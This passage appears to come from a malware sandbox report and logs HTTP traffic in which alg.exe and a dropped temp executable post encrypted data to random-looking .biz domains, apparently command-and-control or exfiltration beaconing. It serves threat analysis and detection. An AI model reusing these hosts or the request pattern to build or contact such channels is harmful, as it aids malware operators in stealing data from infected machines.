                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=581adf12b1fabf79c0b668fa7f972696|155.94.241.187|1731920252|1731920252|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        2192.168.2.104981754.244.188.177807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:32.042726040 CET354OUTPOST /obvywkjre HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:32.042829037 CET778OUTData Raw: 0b 69 cf ca 43 c8 d8 7b fe 02 00 00 e9 1b 6d 30 e8 90 ac bb 1e da f6 27 a3 4c f5 64 f3 86 4e 7f 9c c1 17 7a 36 75 84 61 05 ff 0a c2 d5 0f b8 f8 88 33 4b 06 ee 7c 75 1c 1e fc d4 04 01 9c 22 6d 62 1a d8 4c c7 ad 4d 97 78 28 41 77 0e 59 99 7b 22 99
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: iC{m0'LdNz6ua3K|u"mbLMx(AwY{"Vs[!8RRMW+V(5(oiAAV},sv&VfoZW>igqjqwL~0[ApY&1!;FV<A[g_Bvxvf`
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:32.851788998 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d3aa7e31e97c9d91bce604b07cc7d225|155.94.241.187|1731920252|1731920252|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        3192.168.2.104982318.141.10.107807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.123837948 CET357OUTPOST /njfejhipdedfbx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:33.123857021 CET778OUTData Raw: dd 3a 48 59 69 9f 37 74 fe 02 00 00 f7 21 30 d4 32 30 6f 29 a9 37 fe 37 19 2c 2b d0 07 11 bb 97 b8 ac 5c 39 8d d0 4f ee 30 50 e0 bd eb 64 ae b6 28 4a bc 06 9f 07 03 35 fa be ac 44 f2 e2 f2 0e 6f 4f 2e 05 4c ab 9a 95 71 b4 c9 f0 e0 a3 ed 29 84 8c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :HYi7t!020o)77,+\9O0Pd(J5DoO.Lq)1%9+J-d:k@n3E^O_v1StX*Q^NOJf['2<0\zNPL FM==1-'b{"y Bksi~
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:34.582048893 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=6f86f303f282354af2ad9d8cf005f947|155.94.241.187|1731920254|1731920254|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        4192.168.2.104983054.244.188.177807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:34.208509922 CET348OUTPOST /gcjwtno HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:34.208550930 CET836OUTData Raw: 67 3a ac 4a 80 d7 59 ef 38 03 00 00 6e 71 1e 89 ad a1 3f 68 f6 f1 c6 20 8d cc c8 93 a9 c5 6f b6 79 67 ed b7 e7 48 86 af e5 85 67 c3 5c 9d 5c 65 23 3d 89 5f 3a 1c 2a 9b d0 3d cd a1 74 82 4e 41 8e c2 61 bc 85 67 a1 3b 0a 9a 00 1c 07 99 50 91 f4 61
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: g:JY8nq?h oygHg\\e#=_:*=tNAag;Pa-rge<v`oayUI=Dq}S{5l-=-{W(,<2gWO|H o88FbO>)^T}!mtz~y--}5h
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.035238981 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d5d5568a6abce50cdafcd4af846e675a|155.94.241.187|1731920254|1731920254|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        5192.168.2.104983454.244.188.177807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:34.894289017 CET349OUTPOST /itufvxod HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:34.894336939 CET778OUTData Raw: 45 32 7c 5c b2 3c a9 30 fe 02 00 00 a7 95 fb 15 10 9c 9f 43 09 73 33 96 b3 21 d6 17 bc 32 c6 af 4c fa 07 e4 14 05 4c 0a 36 25 6f 1b 36 78 8b d0 79 09 22 69 3d 4c 22 a9 2d d0 22 ff bb f2 4c 35 d0 85 ed bf 21 c1 ca 2e 5c 9e 2d 5e 2d 40 6f 5f d6 31
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: E2|\<0Cs3!2LL6%o6xy"i=L"-"L5!.\-^-@o_1hQ/32eSCOh,ij]Z8/a7$1!&T]@P .uVl[FNM3A'_fz"x94slT0P7+m)L#~o{($
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.720582962 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=02aa6920d185758ebb1c81820c3ccff2|155.94.241.187|1731920255|1731920255|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        6192.168.2.104983744.221.84.105807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.274419069 CET353OUTPOST /jpdqgjmmo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.274460077 CET836OUTData Raw: 28 18 94 67 87 0e af 5c 38 03 00 00 50 68 5e 3e f3 54 b0 22 51 8d 42 a7 3d 82 9f 7b 98 4d c4 87 c3 91 ad c1 ea b5 4b 65 e7 e2 c5 82 e1 84 11 f3 b9 46 cc 26 d7 56 18 63 c0 d2 ae 6b c8 87 0b d9 f2 5f 6b eb 25 24 59 f3 ce 9c ad 3d bd 1f 33 3a 6a 95
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (g\8Ph^>T"QB={MKeF&Vck_k%$Y=3:jMfDU[D%(#HbDn@*W@?_'MrGZ]3$w]} b+TfUa5Lh>(uh3qh2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:35.943691969 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=89ee7776a689128dd7f50fb758f2aba3|155.94.241.187|1731920255|1731920255|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        7192.168.2.1049846172.234.222.143807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:36.938134909 CET357OUTPOST /rneunjrpeefdom HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:36.938134909 CET836OUTData Raw: 16 0f b6 01 90 02 fc 12 38 03 00 00 e1 76 10 0b 81 ef 60 b7 27 66 36 7f 48 31 3b 57 08 55 a5 d4 5a a6 4c a7 f1 fc 4c 03 07 c3 23 87 c7 69 95 29 1f 3f c1 2d 3c b1 98 77 2e f5 9e ea 22 5e 76 49 e2 db ec a6 84 5b 63 84 78 0e 01 5b be bc 81 63 ba b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 8v`'f6H1;WUZLL#i)?-<w."^vI[cx[cL9%\SQ3Q~Oya=QdK?Y|.Q)u5iq2y(KK@0rhRvhnf1IA,w$>KbL\B 3_(oBO#d=D<V>


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        8192.168.2.104985144.221.84.105807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:37.347918987 CET348OUTPOST /jnek HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:37.347935915 CET778OUTData Raw: 73 9d e0 be 63 2c 56 36 fe 02 00 00 90 32 85 82 8a ca b7 cd 6a 4a 98 7a 68 d4 dc b3 59 a5 82 a0 b7 d0 fd 92 e5 b0 6c bb 96 7c d5 60 98 73 d1 92 cd 15 d4 f7 2c 70 68 18 24 06 aa 60 5d 96 2e 24 8e 80 5d 89 6c 65 be d6 b5 13 92 2f ae 72 fd 30 c0 62
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: sc,V62jJzhYl|`s,ph$`].$]le/r0blqhV>3*G@3=Bz0+;{oX'F ?RcT]T ynO4Hm*t*w70Y}zoq/mClNt[m hXrbzeEW,853L0r.fo?"HW8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:37.998219013 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=6ad5a03a4017e27709d6e77750250d4d|155.94.241.187|1731920257|1731920257|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        9192.168.2.1049852172.234.222.143807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:37.675784111 CET347OUTPOST /ogua HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:37.675828934 CET836OUTData Raw: 73 c1 a4 09 62 ae f7 06 38 03 00 00 5c 52 39 6b 01 81 74 ae d2 01 8a 86 c4 95 94 fc 3c b6 d5 ec 22 70 de 16 4e 7e 33 f7 88 0c 98 19 c9 4f cb 86 32 39 f5 eb a2 d3 68 48 cb da 10 7a 98 1a 69 a5 53 12 39 3b 75 e1 19 64 77 14 3a 51 49 fc 77 cf 94 50
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: sb8\R9kt<"pN~3O29hHziS9;udw:QIwPFMN70k;Z g)> P$\{LY[Q"]<)$4gEN$!FYhUm%co5Q's?mZ>2B$w|@


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        10192.168.2.1049858172.234.222.138807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.248008966 CET352OUTPOST /yypcywwrp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.248049021 CET778OUTData Raw: 9d 6d 11 9b 8f 30 46 c8 fe 02 00 00 02 b3 c7 f4 5a 2f 1c 91 00 c8 d8 f3 f9 89 35 d5 13 81 51 33 cf 8a 0a c7 91 73 e4 71 9f bc 43 dd ae 06 4f 75 fb d1 f6 f7 a9 99 3f a3 c5 9e 89 d3 88 9b b0 7b 3a d4 dd 91 d3 3f 45 20 44 6f 5e 46 b6 9a 0c b7 b5 d4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: m0FZ/5Q3sqCOu?{:?E Do^FYCEpF%~6h J&p rE<@g's-udd%K_<P_.M\lv]MHZ97TTf<}A\EAPNr+=


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        11192.168.2.104986018.141.10.107807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.391398907 CET349OUTPOST /mekek HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:38.391416073 CET836OUTData Raw: 05 3a 14 06 dd c5 79 06 38 03 00 00 19 30 1c a4 09 3e 66 df 00 06 f7 87 48 4e 55 66 e0 d2 5f a1 b4 6b e1 e2 20 89 72 0f 8b 80 7b 7c 8a dd c0 fd 8a 12 ae aa ac d1 64 02 1b 99 5b 11 e4 36 79 20 8b 26 37 88 aa 5b fb 74 5f e8 d2 57 38 6c 11 6d af c7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: :y80>fHNUf_k r{|d[6y &7[t_W8lmi,~@|isY%GS\cfJm,;o*4^lsRy""B@#<I<GxG]hFFj&-MuBy[_+WfBl`3
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.849206924 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:39 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=78b232a6806e5ffff8e451075144dec0|155.94.241.187|1731920259|1731920259|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        12192.168.2.104986782.112.184.197807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:39.998915911 CET350OUTPOST /qfuwtgjk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
